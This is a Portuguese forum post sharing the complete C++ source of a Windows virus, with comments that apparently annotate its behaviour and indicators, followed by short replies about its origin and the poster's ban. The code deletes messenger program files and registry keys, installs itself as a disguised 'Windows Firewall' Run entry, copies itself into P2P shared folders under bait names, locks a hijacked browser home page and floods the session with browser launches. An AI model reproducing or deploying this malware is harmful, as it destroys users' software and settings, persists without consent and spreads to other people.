Pequeno vírus:
load.h
/*LOAD.H*/
#include <stdio.h>
#include <stdlib.h>
#include <fstream>
using namespace std;
// Destructive payload: each function below deletes files of an installed
// instant-messaging client with remove() and then runs system("cls"), which
// spawns the command interpreter to clear the screen (main() has already
// detached the console by the time these run, so the visual effect is moot).
// All paths are hard-coded absolute paths under C:\Program Files, so only
// default installs on drive C: are affected. No return value of remove() or
// system() is checked; every failure is silent.
// Defender note: a non-installer process deleting DLLs/EXEs under Program
// Files, interleaved with cmd.exe spawns, is a usable behavioural detection
// signal for this sample; the file names below are its file indicators.
namespace system_chat //deletes instant chat
{
void del_msn() //disables msn messenger (works)
{
remove("C:\\Program Files\\MSN Messenger\\wmv9vcm.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcdll.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcres.dll");
remove("C:\\Program Files\\MSN Messenger\\msidcrl.dll");
remove("C:\\Program Files\\MSN Messenger\\msgrapp.dll");
remove("C:\\Program Files\\MSN Messenger\\msgsc.dll");
remove("C:\\Program Files\\MSN Messenger\\msgslang.dll");
remove("C:\\Program Files\\MSN Messenger\\psmsong.dll");
system("cls");
}
void del_aim()//deletes AOL helper DLLs and runs rmdir on AOL directories (works)
{
remove("C:\\Program Files\\Common Files\\AOL\\eehelper.ddl");
remove("C:\\Program Files\\Common Files\\AOL\\1144979710\\ee\\AOLSvcMgr.dll");
remove("C:\\Program Files\\Common Files\\AOL\\xprt5.dll");
// The three rmdir calls below go through the shell, so each one is a
// separate cmd.exe child process of this binary.
system("rmdir C:\\Program Files\\AOL");
system("rmdir C:\\Program Files\\AOD");
system("rmdir C:\\Program Files\\Common Files\\AOL\\1144979710");//overkill
system("cls");
}
void del_mirc() //disables mIRC(works)
{
remove("C:\\Program Files\\mIRC\\mirc.exe");
remove("C:\\Program Files\\mIRC\\servers");
system("cls");
}
void del_gaim() //disables Gaim (works)
{
remove("C:\\Program Files\\Gaim\\gaim.dll");
remove("C:\\Program Files\\Gaim\\ssl3.dll");
remove("C:\\Program Files\\Gaim\\softokn3.dll");
system("cls");
}
}
// Recursively deletes the registry key lpSubKey (relative to hKeyRoot) together
// with every subkey beneath it. Returns TRUE on success or when the key does
// not exist, FALSE on any other error.
// lpSubKey must be a writable buffer with spare room after the string: the
// function appends "\" and each enumerated subkey name in place and restores
// the original string before returning. That append is not bounds-checked, so
// the caller is responsible for sizing the buffer (RegDelnode passes a
// 2 * MAX_PATH stack buffer for this reason).
// This is generic registry-cleanup code; what it destroys is decided by the
// caller (main() below aims it at HKEY_CURRENT_USER\Control Panel\* keys).
BOOL RegDelnodeRecurse (HKEY hKeyRoot, LPTSTR lpSubKey)
{
LPTSTR lpEnd;
LONG lResult;
DWORD dwSize;
TCHAR szName[MAX_PATH];
HKEY hKey;
FILETIME ftWrite;
// First, see if we can delete the key without having
// to recurse.
// RegDeleteKey only succeeds on a key that has no subkeys, so this is the
// leaf fast path.
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
// Open the key read-only so its subkeys can be enumerated.
lResult = RegOpenKeyEx (hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS)
{
if (lResult == ERROR_FILE_NOT_FOUND) {
// A missing key counts as "already deleted". main() calls FreeConsole()
// before this code runs, so these printf() messages are unlikely to be
// visible anywhere.
printf("Key not found.\n");
return TRUE;
}
else {
printf("Error opening key.\n");
return FALSE;
}
}
// Check for an ending slash and add one if it is missing.
// lpEnd points just past the current string; subkey names are copied there.
lpEnd = lpSubKey + lstrlen(lpSubKey);
if (*(lpEnd - 1) != TEXT('\\'))
{
*lpEnd = TEXT('\\');
lpEnd++;
*lpEnd = TEXT('\0');
}
// Enumerate the keys
// Index 0 is requested on every iteration on purpose: each successful
// recursive call deletes subkey 0, so the next subkey shifts into index 0.
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
if (lResult == ERROR_SUCCESS)
{
do {
// Append the child name in place (unbounded copy, see header) and recurse.
lstrcpy (lpEnd, szName);
if (!RegDelnodeRecurse(hKeyRoot, lpSubKey)) {
break;
}
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
// Remove the trailing separator so lpSubKey names the parent key again.
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey (hKey);
// Try again to delete the key.
// With the subkeys gone (unless the loop broke on an error), the parent
// itself can now be deleted.
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
return FALSE;
}
// Entry point for recursive key deletion. Copies lpSubKey into a stack buffer
// twice MAX_PATH long because RegDelnodeRecurse appends subkey names to the
// path in place. lstrcpy is unbounded, so an lpSubKey longer than
// 2 * MAX_PATH would overflow szDelKey; main() only ever passes short literals.
// Returns whatever RegDelnodeRecurse returns (TRUE = deleted or absent).
BOOL RegDelnode (HKEY hKeyRoot, LPTSTR lpSubKey)
{
TCHAR szDelKey[2 * MAX_PATH];
lstrcpy (szDelKey, lpSubKey);
return RegDelnodeRecurse(hKeyRoot, szDelKey);
}
// Browser-hijack payload: sets Internet Explorer's start page for the current
// user to `site` and, when `lock` is true, writes the IE policy DWORD that
// disables changing the home page through the options dialog.
//   site: value written to HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
//   lock: 1 -> HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage = 1
// Every registry call's return value is ignored, so failures are silent.
// Defender note: writes to these two values by anything other than IE or
// Group Policy processing are a long-standing hijack indicator. Both keys
// live under HKCU, so this step needs no elevation.
void hijack_homepage(char* site, bool lock)
{
HKEY hKey1;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",1,KEY_SET_VALUE,&hKey1 );
RegSetValueEx(hKey1, "Start Page",1,REG_SZ,(const unsigned char*)site,MAX_PATH);
RegCloseKey(hKey1);
// Convert the bool to the DWORD the policy value expects.
DWORD i;
if (lock)
{
i = 1;
}else i = 0;
HKEY hKey2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel",1,KEY_SET_VALUE,&hKey2 );
RegSetValueEx(hKey2, "HomePage",1,REG_DWORD,(BYTE*)&i,sizeof(i));
RegCloseKey(hKey2);
}
---------------------------
main.cpp
---------------------------
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <string.h>
#include <fstream>
#include "load.h"
//******************************************************************************
// //
// DEMONSTRATION OF A VIRII //
// //
// BY //
// //
// Nerve //
//----------------------------------------------------------------------------//
// //
// For any question you can contact me at nerve@gmail.com //
// //
// //
// ~~EDUCATIONAL ONLY~~ //
// //
//******************************************************************************
using namespace std;
// Declared here but neither defined nor called anywhere in this listing.
void DelaySecs(int secs);
// Thread body for the "browser spammer" loop in main(): asks the shell to
// "open" www.rohitab.com, which launches the user's default handler for that
// target (normally the web browser), then returns 0. Because main() creates
// this thread in an unbounded loop, the net effect is an endless stream of
// browser launches - a denial of service on the interactive session.
// The LPVOID parameter is unused.
ULONG WINAPI OurFirstThread(LPVOID)
{
ShellExecute(0,"open","www.rohitab.com",NULL,NULL,1);
return(0);
}
// Forward declarations. reg() is defined after main(); RegDelnodeRecurse and
// hijack_homepage are already defined in load.h (included above), so these
// two lines merely re-declare them. RegDelnode, which main() actually calls,
// is not re-declared here and is visible only through load.h.
void reg(void);
BOOL RegDelnodeRecurse(HKEY hKeyRoot, LPTSTR lpSubKey);
void hijack_homepage(char* site, bool lock);
// Program entry point. Runs the whole payload in this order:
//   1. hide the console;  2. install persistence via reg();
//   3. delete HKCU control-panel keys;  4. delete messenger files;
//   5. copy the dropped LSD.exe into P2P shared folders under bait names;
//   6. drop marker files in the All Users Start Menu;
//   7. hijack the IE home page;  8. spawn browser-launching threads forever.
// The final loop has no exit, so `return 0` is unreachable.
int main()
{
// NOTE: this local named `system` shadows the system() function from
// <cstdlib> for the rest of main(); the system("cls") calls inside
// system_chat are in another scope and unaffected.
char system[100];
char pathtofile[100];
FreeConsole();//get rid of the console window :-0
// Self-copy to the system directory + HKLM Run value (see reg() below).
reg();
// pathtofile is filled here but never read again within main().
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
// Build "<system dir>\LSD.exe" - the location reg() copied this executable
// to - in a 100-byte buffer; the strcat is not bounds-checked.
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\LSD.exe");
//******************************************************************************
//Deletes various registry keys
//******************************************************************************
// Per-user screen saver, sound scheme and printer settings. bSuccess is
// assigned on every line but never examined.
BOOL bSuccess;
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DFlyingObj");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DPipes");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Bezier");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Marquee");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Mystify");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Stars");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Sound");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Printers");
//******************************************************************************
// Disable some instant messengers and Other Payloads
//******************************************************************************
system_chat::del_msn();
system_chat::del_gaim();
system_chat::del_mirc();
system_chat::del_aim();
// Propagation: copy the dropped LSD.exe into the shared folders of four P2P
// clients under enticing file names, presumably so that other users of those
// networks download it. bFailIfExists is 0, so existing files are overwritten.
// Defender note: these four destination paths, plus LSD.exe in the system
// directory, are the file indicators for this sample.
CopyFile(system,"C:\\program files\\Morpheus\\My Shared Folder\\Vista_theme_pack.exe",0);
CopyFile(system,"C:\\program files\\Grokster\\My Grokster\\San Andreas.exe",0);
CopyFile(system,"C:\\program files\\eMule\\Incoming\\steam_down.exe",0);
CopyFile(system,"C:\\program files\\limewire\\Shared\\Limewire_pro.exe",0);
// Defacement markers: five zero-byte .jpg files (opened and closed with
// nothing written) plus PWN.txt containing a taunt, all in the All Users
// Start Menu so they show up for every account on the machine.
ofstream a_file9("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Hell.jpg");
a_file9.close();
ofstream a_file4("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PACKET_MONKEYS.jpg");
a_file4.close();
ofstream a_file5("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\NERVE.jpg");
a_file5.close();
ofstream a_file96("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\MATRIX.jpg");
a_file96.close();
ofstream a_file95("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\HARMONEY.jpg");
a_file95.close();
ofstream hi("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PWN.txt");
if(hi.is_open())
{
hi << "You Got Owned!!\n\n"<< endl
<< "GET LINUX MOTHA FUCKA\n" << endl;
}
hi.close();
//******************************************************************************
//Changes Homepage
//******************************************************************************
// lock=1: also sets the policy value that stops the user changing it back.
hijack_homepage("www.rohitab.com",1);
//******************************************************************************
// Browser spammer
//******************************************************************************
Sleep(2000);//Wait for 2000ms
// Unbounded thread creation: every iteration starts OurFirstThread, which
// opens the site via ShellExecute. The handle returned by CreateThread is
// discarded (never closed) and the loop has no exit, so the session is
// flooded with browser launches until the process is killed.
for (;;)
{
unsigned long ThreadId;
CreateThread(NULL,0,OurFirstThread,0,0,&ThreadId);
}
//exit Da suxor
//
// Unreachable: the loop above never terminates.
return 0;
}
// Persistence installer, called first thing from main():
//   1. copies this executable (GetModuleFileName of the main module) to
//      "<system dir>\LSD.exe", overwriting any existing file
//      (bFailIfExists = false);
//   2. registers that path under
//      HKLM\Software\Microsoft\Windows\CurrentVersion\Run as a value named
//      "Windows Firewall", so it is started at every logon and looks like a
//      legitimate component to anyone glancing at the Run key.
// Writing to HKLM needs administrative rights; under a standard user account
// the RegSetValueEx fails, and since no return value here is checked the
// persistence simply does not install. The REG_SZ write passes sizeof(system)
// (the whole MAX_PATH buffer) rather than the string length, so the stored
// value data carries whatever followed the terminator on the stack - a
// distinctive forensic artifact of this sample.
// Defender note: a Run value named "Windows Firewall" pointing at LSD.exe in
// the system directory is the registry indicator; running as a standard user
// (least privilege) blocks this step outright.
void reg(void)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\LSD.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}
PS: Me distraí e postei esse vírus no lugar errado, era pra ser na ala C++, se alguém puder transferir de lugar agradeço.
Qual é a fonte, pyro?
* ponto.
Um amigo meu da Holanda intitulado Freak me passou pelo MSN; ele afirma que a autoria é do irmão dele, então preferi nem mencionar a fonte.
Mas a fonte é: irmão de um cara na Holanda chamado Freak.
Não vai explicar nada?
@Shadows
PyroMaker está banido.
Leia o código e você terá uma explicação.